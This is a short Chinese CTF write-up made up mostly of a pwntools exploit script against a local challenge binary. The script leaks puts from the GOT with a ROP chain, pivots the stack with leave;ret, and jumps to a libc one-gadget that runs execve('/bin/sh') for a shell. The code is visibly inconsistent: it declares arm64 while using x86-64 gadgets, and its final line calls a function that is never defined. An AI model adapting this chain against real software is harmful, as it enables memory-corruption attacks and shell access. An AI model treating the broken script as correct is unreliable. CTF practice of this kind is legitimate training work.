前言
很揪心,一直想着用dl_resolve
解决,不过好麻烦,不仅要读还要写,还需要泄露地址,不如rop
简单。
而且了解到libc
中execve('/bin/sh\x00')
的操作,不过由于题目没有setbuf
导致,所以缓冲区就好乱,本地能通,远程却大不了。
代码
from pwn import*
import roputils
def attack_remote_rop2():
context(arch='arm64', os='linux', endian='little', rename_corefiles=False)
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh', '-c']
conn = process("./main")
elf = ELF("./main")
control_ebp = 0x601060 + 0x100
leave_ret = 0x40060F
ret = 0x40061C
puts_plt = 0x4004C0
puts_got = 0x601018
read_plt = 0x4004d0
pop_rdi = 0x400693
pop_rsi = 0x400691
read_again = 0x4005FC
# log.info('puts_got addr ==> 0x%x' % elf.got['puts'])
# write bss
raw_input("go?")
payload = 'a' * 0x100 + p64(pop_rdi) + \
p64(puts_got) + p64(puts_plt) + p64(0x4005C2)
conn.sendline(payload)
sleep(0.1)
# write stack
payload = 'a' * 0xa + p64(control_ebp - 8) + p64(leave_ret)
conn.sendline(payload)
sleep(0.1)
put_addr = u64((conn.recvuntil('\x7f')[-6:] + '\x00' * 2))
log.info('put_addr addr ==> 0x%x' % put_addr)
system_addr = (put_addr - 0x809c0) + 0x4f440
exec_addr = (put_addr - 0x809c0) + 0x4F322
'''
text:000000000004F322 mov rax, cs:environ_ptr
text:000000000004F329 lea rdi, aBinSh ; "/bin/sh"
text:000000000004F330 lea rsi, [rsp+198h+var_158]
text:000000000004F335 mov cs:dword_3ED5E0, 0
text:000000000004F33F mov cs:dword_3ED5E4, 0
text:000000000004F349 mov rdx, [rax]
text:000000000004F34C call execve
'''
log.info('system_addr addr ==> 0x%x' % system_addr)
raw_input("go?")
# write bss two
conn.sendline('a' * 8)
sleep(0.1)
# write stack
payload = 'a' * 0xa + 'a' * 8 + p64(exec_addr)
conn.sendline(payload)
sleep(0.1)
conn.interactive()
attack_remote_dl()
总结
-。-可还行